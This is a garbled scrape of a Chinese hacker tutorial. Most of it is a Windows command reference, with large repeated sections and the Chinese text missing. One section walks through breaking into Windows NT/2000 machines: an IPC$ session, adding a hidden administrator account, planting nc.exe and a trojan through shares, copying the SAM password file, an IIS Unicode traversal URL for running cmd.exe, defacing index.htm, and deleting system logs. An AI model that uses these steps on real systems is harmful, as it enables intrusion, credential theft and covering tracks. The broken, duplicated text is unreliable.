Professional Documents
Culture Documents
黑客教程
黑客教程
Cracker Hacker
rfc
IP
1
2
3
4
5
ftppingnet
tcp/ip
C asp cgi
htm
phpjava
C htm
wuftpApache
QQ QQ
3windows
4 CMD ASP PHP JAVA
5 BBS X
6
**
**
7
8 QQ
9
10
()
1 IPC
windows
2 windows ,windows
3basic ,,
4 (, ),
sql NBSI.
,,
windows
,.
........ ,
2000 (),
,
().
,., Di~~~
,....:
,, blog,,,(
),.
.
: ( :windows2000 ,VPN
,windows_HOME XP "" IIS......)
E
3
1:cmd
2cmd
.bat
:cmd,
IPC$
cmd
cmd
cmd and
cmd "/?" ping ping /?
google
google
pass:^_^
Enjoy it !
4
DOS
dir deltree cls cd
copy diskcopy del format
edit mem md move
more type rd sys DOS
ren xcopy chkdsk attrib
ctty emm386
:
Dir
? **
*.
., dir *.exe
dir .exe
/p
/w
5
/s
win
Attrib
attrib
+r
-r
+a
-a
+s
-s
+h
-h
Cls
Exit
format
/q
/q
Ipconfig
TCP/IP (DHCP)
(DNS) ipconfig IP
/all
TCP/IP
ipconfig
IP
TCP/IP DHCP IP (APIPA)
md
Move
Nbtstat
TCP/IP (NetBT) NetBIOS
NetBIOS
-A IPAddress
NetBIOS IP
Netstat
TCP IP IPv4
Ping
(ICMP)
TCP/IP
IP
Ping TCP/IP
ping Ip
-t
ping
CTRL-BREAK ping CTRL-C
-lSize
32size 65,527
Rename (Ren)
Shutdown
shutdown
-m ComputerName
-t xx
xx 20
-l
-m ComputerName
-s
-r
-a
-l ComputerName
-a
System File Checker (sfc)
win
/scannow
/scanonce
/purgecache
Windows
/cachesize=x
Windows MB
type
type
bat
Tree
Xcopy
/s
/sxcopy
/e
copy
del
1.
ping 192.168.10.88 t t
2.DNSIPMac
A.Win98winipcfg
B.Win2000 Ipconfig/all
C.NSLOOKUP DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 DNS 41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.
Net send
/IP|* ()
net stop messenger
net start messenger
4.
ping a IP t NetBios
nbtstat -a 192.168.10.146
5.netstat -a
netstat -s -e TCPUDPICMP IP
6. arp
IP MAC
arp -a
7.
IP MAC IP
ARP s 192.168.10.59 0050ff6c0875
IP MAC
arp -d IP
8.
net config server /hidden:yes
net config server /hidden:no
9. net
A. net view
IP
C:\>net view 192.168.10.8
192.168.10.8
------------------------------------- Disk
B. net user
C. net use
net use z: \\192.168.10.8\movie IP movie
Z
D. net session
C:\>net session
------------------------------------------------------------------------------\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
10.
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 325S
11.
A. net share
B.
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
$
C.
c:\net share mymovie=e:\downloads\movie /users:1
mymovie
1
12. DOS IP
A. IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "" static IP mask gateway
B.IP
interface ip>show address
Arp
" (ARP)" ARP
IP
arp
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
InetAddr
arp -a
InetAddr IP
ARP -N IfaceAddr
IfaceAddr
IP -N
-g [InetAddr] [-N IfaceAddr]
-a
-d InetAddr [IfaceAddr]
IP InetAddr IP
IfaceAddr
IfaceAddr IP
(*) InetAddr
-s InetAddr EtherAddr [IfaceAddr]
ARP IP InetAddr EtherAddr
ARP IfaceAddr
IfaceAddr IP
/?
InetAddr IfaceAddr IP
EtherAddr
00-AA-00-4F-2A-9C
-s ARP
TCP/IP ARP
arp
""
(TCP/IP)
ARP
arp -a
IP 10.0.0.99 ARP
arp -a -N 10.0.0.99
IP 10.0.0.80 00-AA-00-4F-2A-9C ARP
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
at
" "
at
[[\\ComputerName]
hours:minutes
[/interactive]
[{/every:date[,...]|/next:date[,...]}] command]
\\computername
at
ID
/delete
ID
/yes
""
hours:minutes
24
00:00 [] 23:59 :
/interactive
command , command
/every:
command
date
MTWThFSSu 1 31
date at
/next:
command
command
Windows
(UNC)
/?
Schtasks at
schtasks at
schtasks "
"
at
at Administrators
Cmd.exe
At Cmd.exe
(.exe) Cmd.exe
cmd /c dir > c:\test.out
at
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
(ID)
(ID) at
Task ID1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due at
at
"
"
at
(>)
at
(^) Output.text
systemroot
at
at at
" "
" "
UNC
at 1:00pm my_backup \\server\share
x: ?
at 1:00pm my_backup x:
at
at
Marketing
at \\marketing
Corp 3
at \\corp 3
8:00 Corp
Maintenance Corp.txt Reports
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports
>> \\maintenance\reports\corp.txt"
Marketing
Archive.cmd
rsh
Host
command
-l UserName
-n
rsh NULL
Command
/?
rsh command
command
command Rsh
">
>"
"RemoteFile""LocalFile"
rsh othercomputer cat remotefile >> localfile
Remotefile otherremotefile
rsh othercomputer cat remotefile ">>" otherremotefile
rsh
Windows XP Professional
rsh
.rhosts
.rhosts UNIX
.rhosts
.rhosts
rcprexec rsh
.rhosts
(#)
host7 #This computer is in room 31A
.rhosts
.rhosts
(TCP/IP)
admin1
vax1 telcon
rsh vax1 -l admin1 telcon
15.Tftp
(TFTP) daemon
UNIX (TFTP) daemon
UNIX
-i
-i
ASCII (EOL)
Host
put
Destination Source
TFTP
get
Destination Source
Source
Destination
Destination Source
/?
get
FileTwo
FileOne put FileTwo
FileOne get
Windows XP Windows 2000 TFTP Windows
2000 TFTP Windows XP Windows 2000
(TCP/IP)
Users.txt vax1
Users19.txt
tftp vax1 put users.txt users19.txt
16.Nbtstat
TCP/IP (NetBT) NetBIOS
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [s] [-S] [Interval]
-a remotename
NetBIOS RemoteName
NetBIOS NetBIOS
NetBIOS
-A IPAddress
NetBIOS IP
-c
NetBIOS NetBIOS
-n
NetBIOS Registered
WINS
-r
NetBIOS WINS Windows XP
WINS
-R
NetBIOS Lmhosts
#PRE
-RR
WINS NetBIOS
-s
NetBIOS IP
-S
NetBIOS IP
Interval
Interval
CTRL+C netstat
/?
Nbtstat
Nbtstat
Input
Output
In/Out
Lift
Local Name NetBIOS
Remote Host IP
<03> NetBIOS NetBIOS
16
<20>
ASCII
Type
Status NetBIOS ""
""
State NetBIOS
NetBIOS
IP
IP
TCP
(TCP/IP)
NetBIOS
CORP07
NetBIOS
nbtstat -a CORP07
IP 10.0.0.99
NetBIOS
nbtstat -A 10.0.0.99
NetBIOS
nbtstat -n
NetBIOS
nbtstat -c
NetBIOS Lmhosts
#PRE
nbtstat -R
WINS NetBIOS
nbtstat -RR
5 IP NetBIOS
nbtstat -S 5
17.Netstat
TCP IP IPv4
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
-a
TCP TCP UDP
-e
-s
-n
TCP
-o
TCP
ID (PID) Windows
"
"
PID -a-n -p
-p Protocol
Protocol Protocol
tcpudptcpv6 udpv6 -s
Protocol tcpudpicmpiptcpv6udpv6icmpv6 ipv6
-s
TCP UDPICMP IP
Windows XP IPv6
IPv6
-p
-r
IP route print
Interval
Interval CTRL+C
netstat
/?
(-) (/)
Netstat
Proto
TCP UDP
Local Address
IP -n IP
*
Foreign Address
IP -n
IP *
(state)
TCP
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
TCP RFC 793
(TCP/IP)
netstat -e -s
TCP UDP
netstat -s -p tcp udp
5 TCP
ID
nbtstat -o 5
TCP
ID
nbtstat -n -o
18.Runas
runas
[{/profile|/noprofile}]
[/env]
[/netonly]
[/smartcard]
/profile
/profile
/no profile
/noprofile
/env
/netonly
/smartcard
/smartcard
/showtrustlevels
/trustlevel
/trustlevel
/showtrustlevels
/user:UserAccountName
user@domain domain\user
/user
/?
runas
runas "
"
runas Administrator Administrator
runas MMC
"
"
Administrator /user:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas (*.exe) MMC (*.msc) MMC
"
""Users""Power Users"
"
MMC "
".
runas
"
"
RunAs RunAs
"
"
""""
Windows 2000
companydomain\domainadmin "
"
runas /user:companydomain\domainadmin "mmc
%windir%\system32\compmgmt.msc"
MMC
19.Route
IP route
route
[-f]
[-p]
[Command
[Destination]
[mask
Netmask]
-f
255.255.255.255
127.0.0.0 255.255.255.0
224.0.0.0 240.0.0.0
addchange delete
-p
add TCP/IP
IP TCP/IP print
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Par
ameters\PersistentRoutes
Command
add
change
delete
print
Destination
IP
0 IP
0.0.0.0
mask subnetmask
IP 255.255.255.255
0.0.0.0 255.255.255.255
0 1
Gateway
IP IP
IP
metric Metric
1 ~ 9999
if Interface
route print
0x if
/?
TCP/IP LAN IP
LAN
TCP/IP
systemroot\System32\Drivers\Etc
Destination"" (DNS)
IP
Gateway DNS systemroot\System32\Drivers\Etc
NetBIOS
print delete Gateway
Destination (*) (*)
(?)
10.*.1, 192.168.* 127.* *224*
"Route:bad
gateway address netmask" 1
1 0
1
Windows NT 4.0Windows 2000Windows Millennium Edition
Windows XP route -p
(TCP/IP)
IP
route print
IP
10.
route print 10.*
192.168.12.1
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
10.41.0.0 255.255.0.0
10.27.0.1
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1
7
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
10.41.0.0 255.255.0.0
10.27.0.1 0x3
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
10.41.0.0 255.255.0.0
route delete 10.41.0.0 mask 255.255.0.0
IP
10.
route delete 10.*
10.41.0.0 255.255.0.0
10.27.0.1 10.27.0.25
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
windowsserver cmd ip -> Windows 2k/2003
Server
ip
Windows2000
Unix ip
C:\>ipconfig (ipconfig ip )
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .:
IP Address............: 10.1.1.94 ip
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
C:\>netsh
netsh>interface
interface>ip
interface ip>set address " " static 10.1.1.111
255.255.255.0 10.1.1.254
interface ip>exit
set :
set address - IP
set dns - DNS
set wins - WINS
IPCONFIG
C:\>ipconfig ipconfig
,
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .
IP Address............: 10.1.1.111
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
..-
? -
aaaa - `aaaa'
abort -
add -
alias -
bye -
commit -
delete -
dhcp - `dhcp'
dump -
exec -
exit -
help -
interface - `interface'
offline -
online -
popd -
pushd -
quit -
ras - `ras'
routing - `routing'
set -
show -
unalias -
wins - `wins'
IP
IP Win2000 IP Win98
IP
IP
?
Win2000 netsh
" "
"cmd" netsh
netsh
int ip
IP dump IP
netsh IP 192.168.0.7
255.255.255.0
C:\Documents and Settings\Administrator>netsh
netsh>int ip
interface ip>set address name =" "source = static addr
= 192.168.0.7 mask = 255.255.255.0
interface ip>exit
ipconfig
C:\Documents and Settings\Administrator>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 2
Media State ........... Cable Disconnected
Ethernet adapter
Connection-specific DNS Suffix .
IP Address............ 192.168.0.7
Subnet Mask ........... 255.255.255.0
Default Gateway ......... 192.168.0.2
Win2000
IP IP
int ip
set address name= source=static addr=192.168.0.7
mask=255.255.255.0
"7.sh" C C
"netsh exec 7.sh" ? ipconfig
IP
IP
"addr" IP
172.19.96.7
IP
int ip
set address name = source = static addr= 172.19.96.7
mask = 255.255.255.0
set address name = gateway = 172.19.96.1 gwmetric
=1
ipconfig/all
IP ?
netstat
netstat TCP/IP netstat -a
netstat -r netstat -e
Ethernet
netstat -s netstat -n
Tracert IP
Tracert IP (TTL) ICMP
-d IP
-h maximum_hops target_name
-j host-list Tracert
-w timeout timeout
target_name IP
pathping
ping tracert
pathping
-n Hostnames
-h Maximum hops
-g Host-list
-p Period ping
-q Num_queries
-w Time-out
-T Layer 2 tag 2 IEEE 802.1p
2
-T
(QoS)
DHCP
netsh
netsh>(Netshell) "dhcp"
dhcp> DHCP
server \\servername server ip_address
" servername
"
DHCP Netshell
/? help
Netshell
route
routing ip add/delete/set/show interface
IP
routing ip add/delete/set/show filter
IP
routing ip add/delete/show boundary
routing ip nat add/delete addressmapping NAT
IGMP
routing ip ospf add/delete/set/show virtif
OSPF
routing ip ospf add/delete/show neighbor
OSPF
routing ip ospf add/delete/show protofilter
OSPF
routing ip ospf add/delete/show routefilter
OSPF
routing ip ospf show areastats OSPF
IPX netsh
routing ipx add/set staticroute IPX IPX
routing ipx add/set staticservice SAP SAP
dump WINS
add name add name /?
add partner add partner /?
add pngserver Persona Non Grata
add pngserver /?
check database check
database /?
check name WINS
check name /?
check version check
version /?
delete name
delete name /?
delete partner
delete partner /?
delete records
delete records /?
delete owners delete
owners /?
delete pngserver Persona Non Grata
delete pngserver /?
init backup WINS init backup /?
init import Lmhosts init import /?
init pull "" WINS
init pull /?
init pullrange WINS
init pullrange /?
init push "" WINS
init push /?
init replicate init
replicate /?
init restore init restore /?
init scavenge WINS init
scavenge /?
init search WINS init search /?
reset statistics reset
statistics /?
set autopartnerconfig
set autopartnerconfig /?
set backuppath set
backuppath /?
set burstparam set
autopartnerconfig /?
set logparam set
logparam /?
set migrateflag set
migrateflag /?
set namerecord set
namerecord /?
set periodicdbchecking
set periodicdbchecking /?
set pullpartnerconfig ""
set pullpartnerconfig /?
set pushpartnerconfig ""
set pushpartnerconfig /?
set pullparam " " set
pullparam /?
set pushparam " " set
pushparam /?
set replicateflag set
replicateflag /?
set startversion ID set
startversion /?
show browser [1Bh]
show browser /?
show database
show database /?
show info show info /?
show name show
name /?
show partner """"
""
show partner /?
show partnerproperties show
partnerproperties /?
show pullpartnerconfig ""
show pullpartnerconfig /?
show pushpartnerconfig ""
show pushpartnerconfig /?
show reccount
show reccount /?
show recbyversion
show recbyversion /?
show server show server /?
show statistics WINS show
statistics /?
show version WINS
show version /?
show versionmap ID ""
show versionmap /?
Interface
interface set/show interface
1NET
IP IPC$
hbx 123456 IP 127.0.0.1
net use \\127.0.0.1\ipc$ 123456 /user:hbx null
lovechina
net user heibai lovechina /add
Administrator
.
net localgroup Administrators heibai /add
\* C .
C \* Z .
net use z:\\127.0.0.1\c$
net start telnet
TELNET .
Guest
guest NT
2000
net user guest /active:yes( :
guest )
net user guest /active:no guest
guest lovechina
net user
/delete ,,
, net
localgroup
administrators , administrator
net user
administrator
del................
2:at
AT
ID=1
at \\127.0.0.1 12:3 nc.exe
NC.EXE.
NCNC NETCAT .
TELNET
99.
12:3
99
..
at ,
:
C:\> AT 22:30 Start C:\prettyboy.mp3
ID = 1 [
22:30
]
3:telnet
.
telnet 127.0.0.1 99
99
.
.
4:FTP
, FTP ,
,, WWW.51.NET,.,,
FTP .
FTP WWW.51.NET,
HUCJS,
654321
ftpwww.51.net
,.
---------------------, INDEX.HTM, C:\, D:\
get c:\index.htm d:\
C INDEX.HTM,
D
put c:\index.htm d:\
5:copy
IPC$
C index.htm 127.0.0.1 C
copy index.htm \\127.0.0.1\c$\index.htm
D C D
copy index.htm \\127.0.0.1\d$\index.htm
WINNT
admin$ winnt
NT
x:\winnt\repair\sam._ sam._
127.0.0.1 C
copy \\127.0.0.1\admin$\repair\sam._ c:\
6set
80 SET
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= IP IP
HTTP_ACCEPT_ENCODING=gzipdeflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows
98;
DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot
PATH_TRANSLATED= E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86
Family
Model
Stepping
3GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0 IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
100% DIR
XX.XX.XX.XX/ XX.XX.XX.XX
7nbtstat
NT 136 139
netbios
NT
nbtstat -A XX.XX.XX.XX
-A
net use \\ IP
net view \\ IP
net use X: \\IP\ \* X
139
netstat -n
----------------
NetBIOS Remote Machine Name Table
Name Type Status
--------------------------------------------Registered
Registered
Registered
Registered
Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
Registered
Registered
<03> .
PENTIUMII
03 :MAC IP
8Shutdown
NT
Shutdown \\IP t:20
20 NT
Telnet
shutdown -m \\
9DIR
10echo
Unicode
index.htm 2
echo >index.htm
echo >>index.htm
index.htm
index.htm
index.htm
>> >
FTP
cnhack
test
get index.htm c:\inetpub\wwwroot\index.htm
index.htm
c:\inetpub\wwwroot\index.htm
bye FTP 98 DOSEXIT DOS
echo
get
index.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
ftp -s:c:\cnhack.txt
ftp -s
cnhack.txt
del c:\cnhack.txt
11:attrib
attrib -r index.htm
index.htm
-+
---------------------attrib +r index.htm
index.htm
12:del
127.0.0.1
NT
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
NT
D C
6
1
net use \IPipc$ "" /user:""
ipc$
NT
everyone 2000
2. IPC$
1. nt/2000/xp ipc$ 98/me
"
""
3
5
51Windows :
53
ip lanmanserver
67
lanmanworkstation ipc$
1219
ipc$
1326
1792
NetLogon
2242
4 ipc$
shell
5 IPC$
ipc$ shell sql cmd telnet
shell admin
6
net use z: \ IPc$ "" /user:"
" c z
ipc$ IP $ copy
muma.exe \IPd$pathmuma.exe
net use y: \IPd$ copy muma.exe y:pathmuma.exe
""
7 ipc$
net use \IPipc$ /del ipc$
net use z: /del z
net use * /del y
8 ipc$
ipc$
pstools
Win2000SrvReskittelnethack
tftpftp dwrccVNCRemoteAdmin
2000server
9 ips$
A ipc$
1
net share ipc$ /del
net share admin$ /del
net share c$ /del
regedit
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]
RestrictAnonymousDWORD00000002
3
server
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanSe
rverParameters] AutoShareServerDWORD:00000000
pro
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanSe
rverParameters] AutoShareWksDWORD:00000000
B ipc$
net stop lanmanserver
XXX
lanmanserver y
C ipc$
ipc$
D
7
DOS
dir deltree cls cd
copy diskcopy del format
edit mem md move
more type rd sys DOS
ren xcopy chkdsk attrib
ctty emm386
:
Dir
? **
*.
., dir *.exe
dir .exe
/p
/w
5
/s
win
Attrib
attrib
+r
-r
+a
-a
+s
-s
+h
-h
Cls
Exit
format
/q
/q
Ipconfig
TCP/IP (DHCP)
(DNS) ipconfig IP
/all
TCP/IP
ipconfig
IP
TCP/IP DHCP IP (APIPA)
md
Move
Nbtstat
TCP/IP (NetBT) NetBIOS
Nbtstat
-a remotename
NetBIOS RemoteName
NetBIOS
-A IPAddress
NetBIOS IP
Netstat
TCP IP IPv4
Ping
(ICMP)
TCP/IP
IP
Ping TCP/IP
ping Ip
-t
ping
CTRL-BREAK ping CTRL-C
-lSize
32size 65,527
Rename (Ren)
Shutdown
shutdown
-m ComputerName
-t xx
xx 20
-l
-m ComputerName
-s
-r
-a
-l ComputerName
-a
System File Checker (sfc)
win
/scannow
/scanonce
/purgecache
Windows
/cachesize=x
Windows MB
type
type
bat
Tree
Xcopy
/s
/sxcopy
/e
copy
del
1.
ping 192.168.10.88 t t
2.DNSIPMac
A.Win98winipcfg
B.Win2000 Ipconfig/all
C.NSLOOKUP DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 DNS 41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.
Net send
/IP|* ()
net stop messenger
net start messenger
4.
ping a IP t NetBios
nbtstat -a 192.168.10.146
5.netstat -a
netstat -s -e TCPUDPICMP IP
6. arp
IP MAC
arp -a
7.
IP MAC IP
ARP s 192.168.10.59 0050ff6c0875
IP MAC
arp -d IP
8.
net config server /hidden:yes
net config server /hidden:no
9. net
A. net view
IP
C:\>net view 192.168.10.8
192.168.10.8
--------------------------------------
Disk
B. net user
C. net use
net use z: \\192.168.10.8\movie IP movie
Z
D. net session
C:\>net session
------------------------------------------------------------------------------\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
10.
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 325S
11.
A. net share
B.
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
$
C.
c:\net share mymovie=e:\downloads\movie /users:1
mymovie
1
12. DOS IP
A. IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "" static IP mask gateway
B.IP
interface ip>show address
Arp
" (ARP)" ARP
IP
arp
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
InetAddr
arp -a
InetAddr IP
ARP -N IfaceAddr
IfaceAddr
IP -N
-g [InetAddr] [-N IfaceAddr]
-a
-d InetAddr [IfaceAddr]
IP InetAddr IP
IfaceAddr
IfaceAddr IP
(*) InetAddr
-s InetAddr EtherAddr [IfaceAddr]
IfaceAddr IP
/?
InetAddr IfaceAddr IP
EtherAddr
00-AA-00-4F-2A-9C
-s ARP
TCP/IP ARP
arp
""
(TCP/IP)
ARP
arp -a
IP 10.0.0.99 ARP
arp -a -N 10.0.0.99
IP 10.0.0.80 00-AA-00-4F-2A-9C ARP
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
at
" "
at
[[\\ComputerName]
hours:minutes
[{/every:date[,...]|/next:date[,...]}] command]
\\computername
[/interactive]
at
ID
/delete
ID
/yes
""
hours:minutes
24
00:00 [] 23:59 :
/interactive
command , command
/every:
command
date
MTWThFSSu 1 31
date at
/next:
command
command
Windows
(UNC)
/?
Schtasks at
schtasks at
schtasks "
"
at
at Administrators
Cmd.exe
At Cmd.exe
(.exe) Cmd.exe
cmd /c dir > c:\test.out
at
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file
OK 3 Each F 11:59 PM backup2.bat
(ID)
(ID) at
Task ID1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due at
at
"
"
at
(>)
at
(^) Output.text
systemroot
at
at at
" "
" "
UNC
at 1:00pm my_backup \\server\share
x: ?
at 1:00pm my_backup x:
at
at
Marketing
at \\marketing
Corp 3
at \\corp 3
8:00 Corp
Maintenance Corp.txt Reports
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports
>> \\maintenance\reports\corp.txt"
Marketing
Archive.cmd
rsh
Host
command
-l UserName
-n
rsh NULL
Command
/?
rsh command
command
command Rsh
">
>"
"RemoteFile""LocalFile"
rsh othercomputer cat remotefile >> localfile
Remotefile otherremotefile
rsh othercomputer cat remotefile ">>" otherremotefile
rsh
Windows XP Professional
rsh
.rhosts
.rhosts UNIX
.rhosts
.rhosts
rcprexec rsh
.rhosts
(#)
host7 #This computer is in room 31A
.rhosts
.rhosts
(TCP/IP)
admin1
vax1 telcon
rsh vax1 -l admin1 telcon
15.Tftp
(TFTP) daemon
UNIX (TFTP) daemon
UNIX
-i
-i
ASCII (EOL)
Host
put
Destination Source
TFTP
get
Destination Source
Source
Destination
Destination Source
/?
get
FileTwo
FileOne put FileTwo
FileOne get
Windows XP Windows 2000 TFTP Windows
2000 TFTP Windows XP Windows 2000
(TCP/IP)
Users.txt vax1
Users19.txt
tftp vax1 put users.txt users19.txt
16.Nbtstat
TCP/IP (NetBT) NetBIOS
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [s] [-S] [Interval]
-a remotename
NetBIOS RemoteName
NetBIOS NetBIOS
NetBIOS
-A IPAddress
NetBIOS IP
-c
NetBIOS NetBIOS
-n
NetBIOS Registered
WINS
-r
NetBIOS WINS Windows XP
WINS
-R
NetBIOS Lmhosts
#PRE
-RR
WINS NetBIOS
-s
NetBIOS IP
-S
NetBIOS IP
Interval
Interval
CTRL+C netstat
/?
Nbtstat
Nbtstat
Input
Output
In/Out
Lift
Local Name NetBIOS
Remote Host IP
<03> NetBIOS NetBIOS
16
<20>
ASCII
Type
""
State NetBIOS
NetBIOS
IP
IP
TCP
(TCP/IP)
NetBIOS
CORP07
NetBIOS
nbtstat -a CORP07
IP 10.0.0.99
NetBIOS
nbtstat -A 10.0.0.99
NetBIOS
nbtstat -n
NetBIOS
nbtstat -c
NetBIOS Lmhosts
#PRE
nbtstat -R
WINS NetBIOS
nbtstat -RR
5 IP NetBIOS
nbtstat -S 5
17.Netstat
TCP IP IPv4
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
-a
TCP TCP UDP
-e
-s
-n
TCP
-o
TCP
ID (PID) Windows
"
"
PID -a-n -p
-p Protocol
Protocol Protocol
tcpudptcpv6 udpv6 -s
Protocol tcpudpicmpiptcpv6udpv6icmpv6 ipv6
-s
TCP UDPICMP IP
Windows XP IPv6
IPv6
-p
-r
IP route print
Interval
Interval CTRL+C
netstat
/?
(-) (/)
Netstat
Proto
TCP UDP
Local Address
IP -n IP
*
Foreign Address
IP -n
IP *
(state)
TCP
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
TCP RFC 793
(TCP/IP)
netstat -e -s
TCP UDP
netstat -s -p tcp udp
5 TCP
ID
nbtstat -o 5
TCP
ID
nbtstat -n -o
18.Runas
runas
[{/profile|/noprofile}]
[/env]
[/netonly]
[/smartcard]
/profile
/profile
/no profile
/noprofile
/env
/netonly
/smartcard
/smartcard
/showtrustlevels
/trustlevel
/trustlevel
/showtrustlevels
/user:UserAccountName
user@domain domain\user
/user
/?
runas
runas "
"
runas Administrator Administrator
runas MMC
"
"
Administrator /user:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas (*.exe) MMC (*.msc) MMC
"
""Users""Power Users"
"
MMC "
".
runas
"
"
RunAs RunAs
"
"
""""
Windows 2000
companydomain\domainadmin "
"
runas /user:companydomain\domainadmin "mmc
%windir%\system32\compmgmt.msc"
MMC
19.Route
IP route
route
[-f]
[-p]
[Command
[Destination]
[mask
Netmask]
-f
255.255.255.255
127.0.0.0 255.255.255.0
224.0.0.0 240.0.0.0
addchange delete
-p
add TCP/IP
IP TCP/IP print
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Par
ameters\PersistentRoutes
Command
add
change
delete
print
Destination
IP
0 IP
0.0.0.0
mask subnetmask
IP 255.255.255.255
0.0.0.0 255.255.255.255
0 1
Gateway
IP IP
IP
metric Metric
1 ~ 9999
if Interface
route print
0x if
/?
TCP/IP LAN IP
LAN
TCP/IP
systemroot\System32\Drivers\Etc
Destination"" (DNS)
IP
Gateway DNS systemroot\System32\Drivers\Etc
NetBIOS
print delete Gateway
Destination (*) (*)
(?)
10.*.1, 192.168.* 127.* *224*
"Route:bad
gateway address netmask" 1
0
1 0
1
Windows NT 4.0Windows 2000Windows Millennium Edition
Windows XP route -p
